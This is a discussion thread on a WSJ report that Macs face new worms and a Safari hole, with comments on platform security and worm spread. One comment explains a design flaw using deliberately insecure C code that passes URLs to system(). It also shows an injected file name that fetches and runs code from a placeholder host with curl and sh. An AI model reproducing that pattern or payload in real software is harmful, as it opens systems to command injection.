Computer 'Worms' Turn on Macs

Carl Bialik from WSJ writes "Macs have been laregly immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"

Immune?

[east+coast]

Macs have been laregly immune to the viruses, worms and malware

Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt to secure. Hopefully they will be able to cut this off at the quick but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?

Wired article re: Mac security

[Kaimelar]

A recent columnist at Wired said what I was thinking already:

From the linked article:

"These Mac security holes are a storm in a teacup. They've inspired hundreds of stories in the press and even the national network news, but if they were Windows holes, no one would have blinked.

That's because holes in Windows are routine, business as usual, while it now appears the Mac is under attack thanks to Apple's brand-new high profile. But this isn't the case.

Last month, there were four "massive" virus attacks on Windows, according to Commtouch, an antispam and antivirus vendor. Indeed, viruses are now so aggressive, they routinely outpace attempts by antivirus companies to distribute protective signatures.

This state of affairs is now so common, I hadn't noticed -- and I work for a technology news site. "Virulent computer virus infects millions worldwide, other non-news at 11."

These Mac "threats" are only news because of their novelty, not the threat level they pose."

Re:Popularity decides if an OS is secure.

[SpooForBrains]

The only supporting argument for this oft-repeated fallacy is that Windows has the biggest market share and the biggest number of security holes.

Far be it for me to shatter your little bubble, but Apache Web Server is more popular than IIS, and has significantly less critical exploits.

God, it feels like Karma whoring just pointing out something so bloody obvious.

It's a proliferation problem...

[TCQuad]

Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.

All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.

Imagine two situations. In the first, everyone is using a Windows machine. In the second, half are using Macs and half are using Windows. Everyone has 5 random other machines in its address book (e-mail addresses of the primary user). In the case of a zero-day exploit for Windows, how quickly will the all-Windows cluster become infected?

In the case of the Mac/Windows hybrid cluster, though, the speed significantly decreases and it becomes possible that some machines will never be infected. Why? Each machine sends out 5 e-mails; those that go to Macs will not be exploited. That means, on average, each machine can only infect 2.5 others (rather than 5) and the path to any Windows machine must not intersect only Macs.

In a real world situation, the lack of intersection is the smaller problem (since most people have everyone's e-mail in their address book), but if you're wasting resources sending out suspicious e-mails to Macs, you're mitigating the advantage of the zero-day exploit.

Re:Faulty reporting

1. Mac OS 9 does not run on Motorola processors. The newest Mac OS that a 68040 will run is 8.1. The newest you can put on a 68000 is 7.5.5 or possibly 7.6.
2. Why do you say Linux will be next? (Well first of all, there are already worms that target Linux boxes, but if you run a recent distro and have secure passwords/key-based SSH auth you are fine. The SSH brute force worms could also in theory affect Mac OS X.) But Mac OS X has a larger consumer install base. By the way, does Mac OS X have a non-executable stack by default yet? I recently discovered that recent Linux kernels do, as well as randomized stack positions. That goes a loooong way in preventing buffer overflows.

Old security hole, shared by Windows & Firefox

[argent]

Among the signs: two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack.

The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...

The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.

This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:

run_application_on_url(char *app, char *url)
{
  char *buffer = malloc(strlen(app)+strlen(url)+6);
  if(!*buffer) panic("Out of memory on malloc");
  sprintf(buffer, "%s \"%s\" &", app, url);
  system(buffer);
}

That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http : //badguy.xx/exploitcode>/tmp/...;sh /tmp/..." .

Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.

What's safe?

Well, there's two options.

1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.

2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.

Here's some options that have been tried and don't work:

1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).

2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).

3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).

So far Apple's tried two of these, let's hope they don't try the third.

* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.